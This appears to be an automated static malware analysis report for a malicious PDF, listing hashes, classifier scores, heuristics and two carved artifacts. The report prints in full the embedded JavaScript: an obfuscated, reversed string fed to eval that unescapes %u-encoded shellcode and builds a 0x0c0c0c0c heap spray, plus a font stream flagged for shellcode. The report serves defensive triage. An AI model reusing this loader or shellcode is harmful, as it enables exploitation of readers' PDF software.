Malicious PDF — malware analysis report

Static analysis result for SHA-256 1adb0eca0e1203d5…

MALICIOUS

PDF

66.6 KB First seen: 2026-05-08
MD5: 8e24345333803df3001b42c8703a04bd SHA-1: 0e091fce7f1ce249c1e7f7f38012b1f6881e3281 SHA-256: 1adb0eca0e1203d5df5a66b853304717f8e5a4ac848324d445886ccc4a063a17
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3764 bytes
SHA-256: 4e4e3762cd7d5534cfbecdb6acdce94b661dedd2bf8be3f0805462715f30b8e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+asLt=]vTeR[lHHrK )++vTeR;0f1x0<vTeR;0=vTeR( rof ;)(yarrA wen = lHHrK rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.pIaWD = asLt ;pIaWD =+ pIaWD )00008x0 < htgnel.pIaWD(elihw ;)2/63556 ,0(gnirtsbus.mCX = pIaWD ;twl =+ mCX ;Orgd =+ mCX ;)2/)42x0-c0c0x0( ,0(gnirtsbus.twl = mCX ;twl=+twl )63556 < 8 + 02 + htgnel.twl( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (lS = twl rav ;) )""(nioj.)" "(tilps."0614  u % 3113  u % f1d8  u % 3939  u % da6e  u % ffec  u % dc76  u % ffad  u % 9a0b  u % e6f2  u % 138b  u % 1276  u % 03db  u % 2d77  u % 1bd3  u % ba3f  u % b59f  u % 5a3c  u % 988b  u % d2a1  u % 0888  u % 2df4  u % 14ba  u % 58f4  u % ac42  u % cee7  u % 1c20  u % aec7  u % abb3  u % bede  u % 7dd2  u % ffa4  u % b9fb  u % e1ee  u % 877d  u % faec  u % 9d96  u % befa  u % df02  u % fab8  u % a21a  u % 2246  u % 1159  u % 390a  u % 6317  u % 6d3a  u % dbd7  u % 1f43  u % 45c7  u % 1728  u % 14ad  u % 5a60  u % 277a  u % 81df  u % 8745  u % 7e68  u % c325  u % ae77  u % 10d5  u % 2889  u % 8fa6  u % 2404  u % a0b6  u % 5237  u % 6302  u % 0e06  u % 5811  u % a462  u % dc9e  u % 1d82  u % 3c9b  u % 4229  u % 6a56  u % 418e  u % 06ee  u % 488c  u % 3caa  u % 517d  u % a0dd  u % ad58  u % dcfb  u % 7844  u % cec6  u % 2526  u % f0e6  u % 090e  u % f80a  u % f0cc  u % 9ad8  u % 6a66  u % c7a7  u % d220  u % 82e4  u % c986  u % a5a1  u % da45  u % c394  u % c964  u % 4bca  u % b551  u % b4c4  u % 3b85  u % 30e4  u % 3731  u % 4013  u % 383c  u % 1b33  u % 339c  u % abeb  u % d30a  u % b5eb  u % 424f  u % 9d47  u % ad0d  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (lS = Orgd rav ;epacsenu = lS rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.